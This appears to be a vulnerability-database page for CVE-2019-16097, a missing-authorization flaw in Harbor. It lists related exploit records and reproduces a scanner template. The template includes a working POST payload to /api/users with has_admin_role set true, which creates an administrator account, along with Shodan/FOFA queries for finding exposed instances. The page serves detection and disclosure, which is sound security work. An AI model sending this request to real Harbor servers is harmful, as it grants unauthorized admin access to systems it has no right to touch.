| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| Exploit for Missing Authorization in Linuxfoundation Harbor | 11 Feb 202123:09 | – | gitee | |
| Exploit for Missing Authorization in Linuxfoundation Harbor | 22 Sep 201911:24 | – | githubexploit | |
| Exploit for Missing Authorization in Linuxfoundation Harbor | 25 Sep 201902:05 | – | githubexploit | |
| Exploit for Missing Authorization in Linuxfoundation Harbor | 19 Sep 201915:12 | – | githubexploit | |
| Exploit for Missing Authorization in Linuxfoundation Harbor | 20 Sep 201902:03 | – | githubexploit | |
| CVE-2019-16097 | 8 Sep 201900:00 | – | attackerkb | |
| CVE-2019-16097 | 20 Sep 201916:00 | – | circl | |
| Harbor Privilege Permission and Access Control Issues Vulnerability | 8 Sep 201900:00 | – | cnvd | |
| Harbor Container Registry Privilege Escalation (CVE-2019-16097) | 1 Mar 202000:00 | – | checkpoint_advisories | |
| CVE-2019-16097 | 8 Sep 201915:22 | – | cve |
id: CVE-2019-16097
info:
name: Harbor <=1.82.0 - Privilege Escalation
author: pikpikcu
severity: medium
description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration.
impact: |
Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information.
remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP.
reference:
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- https://github.com/goharbor/harbor/issues/8951
- https://nvd.nist.gov/vuln/detail/CVE-2019-16097
- https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517
- http://www.vmware.com/security/advisories/VMSA-2019-0015.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2019-16097
cwe-id: CWE-862
epss-score: 0.23284
epss-percentile: 0.97491
cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:*
metadata:
max-request: 1
vendor: linuxfoundation
product: harbor
shodan-query: http.favicon.hash:657337228
fofa-query: icon_hash=657337228
tags: cve,cve2019,intrusive,harbor,linuxfoundation,vuln
http:
- method: POST
path:
- '{{BaseURL}}/api/users'
body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "[email protected]", "realname": "poc"}
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: word
part: response
words:
- "username has already been used"
- "Location: /api/users/"
condition: or
- type: status
status:
- 201
- 409
condition: or
# digest: 490a00463044022055a2224d9ab83de6006586d63d16ba5b4ea546592b207b4a68477a3cc98950f902204d6c6e9c5750a829ed9c538779090d5a6013a642face40023fea507bff1fe32c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation